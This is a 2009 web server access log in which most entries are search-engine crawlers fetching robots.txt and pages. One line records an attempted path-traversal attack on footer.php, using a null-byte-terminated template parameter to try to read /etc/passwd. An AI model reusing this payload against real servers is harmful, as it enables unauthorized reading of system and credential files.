193.252.118.175 - - [29/Jun/2009:01:18:07 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.118.175 - - [29/Jun/2009:01:18:13 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
65.55.106.208 - - [29/Jun/2009:01:26:02 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.69 - - [29/Jun/2009:01:54:19 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
38.103.63.62 - - [29/Jun/2009:02:23:57 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
81.52.143.30 - - [29/Jun/2009:02:30:03 +0200] "GET /f-maintitle.html HTTP/1.1" 200 5030 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
38.103.63.62 - - [29/Jun/2009:02:31:14 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)"
65.55.106.213 - - [29/Jun/2009:02:37:21 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.213 - - [29/Jun/2009:02:43:00 +0200] "GET / HTTP/1.1" 200 7869 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.14.199.8 - - [29/Jun/2009:02:57:07 +0200] "GET / HTTP/1.1" 302 353 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
72.14.199.85 - - [29/Jun/2009:02:57:09 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=5454548576667470243)"
74.6.18.228 - - [29/Jun/2009:03:10:21 +0200] "GET /f-horrorkatze.html HTTP/1.0" 200 7865 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.51.114 - - [29/Jun/2009:03:11:43 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
8.9.222.1 - - [29/Jun/2009:04:01:22 +0200] "GET /includes/footer.php?template=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 2748 "http://various-euro.com/includes/footer.php?template=../../../../../../../../../etc/passwd%00" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
209.59.208.193 - - [29/Jun/2009:04:07:31 +0200] "GET / HTTP/1.1" 200 7869 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)"
208.96.54.76 - - [29/Jun/2009:04:15:04 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
